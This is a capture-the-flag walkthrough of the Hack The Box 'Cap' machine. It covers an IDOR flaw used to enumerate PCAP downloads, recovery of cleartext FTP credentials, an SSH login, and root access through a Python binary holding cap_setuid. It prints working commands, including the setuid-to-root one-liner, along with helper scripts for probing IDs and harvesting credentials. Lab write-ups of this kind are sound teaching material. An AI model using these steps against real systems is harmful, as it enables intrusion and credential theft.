HACK THE BOX - CAP
The Cap machine on Hack The Box is an excellent example of how multiple subtle weaknesses can be chained together into a full system compromise. This walkthrough not only explains how to root the box, but also dives into the technical challenges encountered along the way, focusing on the reasoning process and the differences between how tools and systems behave. These nuances are essential for anyone working in cybersecurity, penetration testing, or building their own pentesting tools.
The process begins with standard reconnaissance against the target 10.129.25.236. Running a scan with “nmap -sC -sV 10.129.25.236” reveals a web application as the primary attack surface. Accessing the target through a browser presents a dashboard with several features, including a function labeled “Security Snapshot (5 Second PCAP + Analysis)”. At this point, the application appears simple, but a provided hint suggests running a scan and observing the URL of the page to which the user is redirected, noting that a portion of it remains constant.
The first real challenge arises when attempting to observe this behavior using command-line tools. Using curl with options such as “-I” to retrieve headers or “-L -v” to follow redirects does not reveal any HTTP redirection. Every response returns a 200 OK status, which seems inconsistent with the hint. This is a classic situation where understanding the difference between server-side and client-side behavior becomes critical.
The application does not perform a traditional HTTP redirect using a 3xx status code and a Location header. Instead, it returns an HTML page that contains logic instructing the client to navigate elsewhere. This redirect is handled entirely on the client side, usually via JavaScript or HTML meta refresh tags. Curl, being a tool that only processes raw HTTP responses, does not execute JavaScript and therefore exposes this intermediate page. A browser, on the other hand, parses the HTML, executes any embedded scripts, and automatically follows the redirect without showing the intermediate content.
HINT: During a pentest, it is essential to compare what the browser shows with what tools like curl or Burp Suite reveal. If a page appears to redirect in the browser but no HTTP 3xx response is visible, it is very likely that the behavior is client-side. In such cases, always inspect the raw HTML for indicators such as meta refresh directives, JavaScript-based navigation (for example window.location), or explicit messages revealing the destination URL.
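The inspection described in the hint can be partly automated. The following is a minimal sketch, not the author's tooling: it scans a raw HTML body (for example, one saved from curl) for meta refresh tags and simple JavaScript location assignments. The function name and both regular expressions are illustrative assumptions, and they only catch the most common patterns.

```python
import re

# Assumed patterns for two common client-side redirect mechanisms.
# They are heuristics and will miss obfuscated or dynamically built URLs.
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*'
    r'content=["\'][^"\']*url=([^"\'>\s]+)',
    re.IGNORECASE,
)
JS_LOCATION = re.compile(
    r'(?:window\.|document\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE,
)


def find_client_side_redirects(html: str) -> list:
    """Return destination URLs hinted at by meta refresh or JS navigation."""
    targets = META_REFRESH.findall(html)
    targets += JS_LOCATION.findall(html)
    return targets
```

An empty result does not prove that no redirect exists; it only means that neither of these two patterns appeared in the body, so a manual read of the HTML is still worthwhile.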
NOTE: Understanding the distinction between client-side and server-side logic is fundamental. Server-side logic runs on the backend, where the client cannot alter it, while client-side logic runs in the user's environment and is inherently untrusted. Many vulnerabilities arise when developers rely on client-side behavior to enforce security, which is never sufficient.
Requesting the page with “curl http://10.129.25.236/capture” returns a message indicating a redirect to a path such as “/data/10”. This is the only visible reference point, which introduces another challenge: there is no direct evidence that other identifiers are accessible. Rather than assuming enumeration is possible, the approach must shift to hypothesis testing. Manually changing the numeric portion of the URL and requesting paths such as “/data/0”, “/data/1”, and “/data/2” shows that the application does not check whether the requester is authorized to access these resources.
This confirms the presence of an Insecure Direct Object Reference (IDOR) vulnerability. Although the application only exposes one endpoint through its interface, the underlying implementation relies on predictable numeric identifiers without enforcing authorization checks. This allows an attacker to access other users’ data simply by iterating through IDs.
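The manual ID iteration can be sketched in a few lines of Python. This is an illustration under assumptions, not the method used in the walkthrough: the helper names are hypothetical, the “/data/<id>” layout is taken from the text above, and the status lookup is passed in as a function so the logic can be exercised without touching the network.

```python
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable


def candidate_urls(base_url: str, ids: Iterable[int]) -> Dict[int, str]:
    """Build the /data/<id> URL for every candidate identifier."""
    root = base_url.rstrip("/")
    return {i: f"{root}/data/{i}" for i in ids}


def probe_ids(base_url: str, ids: Iterable[int],
              fetch_status: Callable[[str], int]) -> list:
    """Return the IDs whose URL answers with HTTP 200 according to fetch_status."""
    urls = candidate_urls(base_url, ids)
    return [i for i, url in urls.items() if fetch_status(url) == 200]


def http_status(url: str) -> int:
    """Fetch a URL and return its final status code.

    urlopen follows server-side redirects, and connection failures
    (urllib.error.URLError) are deliberately left to propagate.
    """
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
```

Against the lab target this could be called as probe_ids("http://10.129.25.236", range(0, 20), http_status). A 200 status is only a first signal; the response bodies still need to be compared to confirm that each ID really exposes a different capture.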
Each of these endpoints provides access to a downloadable PCAP file. PCAP, or Packet Capture, files contain recorded network traffic and are commonly generated by tools such as tcpdump or Wireshark. They store raw packets, including protocol headers and payload data, allowing the reconstruction of full communication sessions. From a penetration testing perspective, PCAP files are extremely valuable because they can reveal sensitive information if the captured traffic is not encrypted.
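Before opening a download in Wireshark, it can help to confirm that the file really is a capture. The sketch below reads the 24-byte global header of the classic pcap format (magic number 0xA1B2C3D4) using only the standard library. The function name is hypothetical, and the code deliberately rejects pcapng files and the nanosecond-timestamp pcap variant rather than trying to handle them.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4  # classic pcap with microsecond timestamps


def read_pcap_global_header(data: bytes) -> dict:
    """Parse the 24-byte global header found at the start of a classic pcap file."""
    if len(data) < 24:
        raise ValueError("too short to contain a pcap global header")

    # The magic number also tells us the byte order used by the writer.
    if struct.unpack("<I", data[:4])[0] == PCAP_MAGIC:
        endian = "<"
    elif struct.unpack(">I", data[:4])[0] == PCAP_MAGIC:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng or other format?)")

    # version major/minor, timezone offset, timestamp accuracy,
    # snapshot length, link-layer type
    major, minor, _thiszone, _sigfigs, snaplen, linktype = struct.unpack(
        endian + "HHiIII", data[4:24]
    )
    return {
        "byte_order": "little" if endian == "<" else "big",
        "version": (major, minor),
        "snaplen": snaplen,
        "linktype": linktype,
    }
```

Passing the first 24 bytes of a downloaded file, read in binary mode, is enough. The linktype value identifies the link-layer framing of the packets that follow, which determines how a parser has to decode each record.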
Opening one of these files in Wireshark initially presents another challenge. Inspecting individual packets does not immediately reveal useful data, as meaningful information is often fragmented across multiple packets. The correct approach is to use the “Follow TCP Stream” functionality, which reconstructs entire communication flows between client and server. By iterating through different streams, it becomes possible to identify sessions containing relevant data.
In this case, one of the streams contains FTP traffic in cleartext, exposing the credentials “USER nathan” and “PASS Buck3tH4TF0RM3!”. This highlights the danger of using unencrypted protocols, as sensitive data can be intercepted and extracted with minimal effort.
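Once a stream has been reconstructed and saved as text (for instance from the “Follow TCP Stream” window), pulling out the login commands is mechanical. The following is a minimal sketch with a hypothetical function name. It assumes the stream is plain FTP control traffic in which each command sits on its own line, and it pairs every USER command with the PASS command that follows it.

```python
import re

# FTP control commands are line-based: "USER <name>" and "PASS <secret>".
FTP_COMMAND = re.compile(r"^(USER|PASS)\s+(.+?)\s*$", re.MULTILINE)


def extract_ftp_credentials(stream_text: str) -> list:
    """Return (username, password) pairs found in a cleartext FTP stream."""
    credentials = []
    pending_user = None
    for command, argument in FTP_COMMAND.findall(stream_text):
        if command == "USER":
            pending_user = argument
        elif pending_user is not None:
            # A PASS that follows a USER completes one login attempt.
            credentials.append((pending_user, argument))
            pending_user = None
    return credentials
```

The function does not check whether the server accepted the login, so each pair should still be verified against the server replies in the same stream.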
With valid credentials available, the next step is gaining access to the system. While FTP login is possible, it provides limited interaction. Attempting SSH access with “ssh nathan@10.129.25.236” using the same password successfully grants a shell, allowing full user-level access and retrieval of the user flag.
The final stage involves privilege escalation. Running “getcap -r / 2>/dev/null” reveals that the binary “/usr/bin/python3.8” has the capability “cap_setuid”. This finding is highly significant and requires a deeper understanding to fully appreciate its impact.
In Linux, capabilities are a more granular alternative to traditional privilege models like SUID. Instead of granting full root privileges to a binary, specific capabilities can be assigned to allow limited privileged operations. The cap_setuid capability allows a process to set its user ID to an arbitrary value at runtime, including UID 0. In isolation, this might seem controlled, but when applied to an interpreter such as Python, it becomes extremely dangerous.
An interpreter is fundamentally different from a fixed-function binary because it allows the execution of arbitrary code. If Python has the ability to call setuid and switch its execution context to UID 0, then any code executed within that interpreter effectively runs as root. This means that an attacker can directly invoke system calls to elevate privileges without needing a memory corruption bug or a complex exploit chain.
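The reasoning above suggests a simple triage rule for “getcap” output: flag every binary that holds cap_setuid, and treat interpreters as the highest priority. The sketch below is an illustration only. The function name and the list of interpreter name prefixes are assumptions, and the parser accepts both the “path = caps+flags” and the “path caps=flags” line layouts, since the exact format depends on the libcap version installed.

```python
import os
import re

# One getcap line: a path, an optional "=", then the capability string.
# Paths containing spaces are not handled by this simple pattern.
GETCAP_LINE = re.compile(r"^(?P<path>\S+)\s+(?:=\s*)?(?P<caps>\S.*)$")

# Hypothetical, non-exhaustive list of interpreter name prefixes.
INTERPRETER_PREFIXES = ("python", "perl", "ruby", "php", "node")


def risky_setuid_binaries(getcap_output: str) -> list:
    """Return (path, is_interpreter) for each binary holding cap_setuid."""
    findings = []
    for line in getcap_output.splitlines():
        match = GETCAP_LINE.match(line.strip())
        if not match:
            continue
        capabilities = set(re.findall(r"cap_[a-z_]+", match.group("caps")))
        if "cap_setuid" in capabilities:
            name = os.path.basename(match.group("path"))
            findings.append(
                (match.group("path"), name.startswith(INTERPRETER_PREFIXES))
            )
    return findings
```

Fed the saved output of “getcap -r / 2>/dev/null”, this would report “/usr/bin/python3.8” with the interpreter flag set. Binaries that are not on the prefix list still deserve a manual look, because any program that can be made to run attacker-controlled code is a candidate.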
In practical terms, this transforms Python into a privilege escalation vector. By executing “python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'”, the process sets its user ID to root and spawns a shell. This results in immediate root access, which can be verified with the “whoami” command. From there, accessing the root directory and retrieving the root flag completes the compromise.
This part of the attack is particularly important because it demonstrates how misconfigured capabilities can be just as dangerous as SUID binaries, yet are often overlooked. Many security assessments focus heavily on SUID checks while ignoring capabilities, making this a powerful and underutilized technique in real-world pentesting.
The Cap machine ultimately provides a comprehensive learning experience, combining web exploitation through IDOR, network traffic analysis via PCAP files, credential harvesting, and privilege escalation through Linux capabilities. It emphasizes the importance of understanding how different layers of a system interact and how small misconfigurations can lead to complete compromise.
This Hack The Box Cap walkthrough by Lorenzo Serafini demonstrates how attention to detail, combined with a solid understanding of underlying technologies, can turn a series of small observations into a full system takeover. It serves as a strong reference for anyone looking to deepen their expertise in cybersecurity and penetration testing.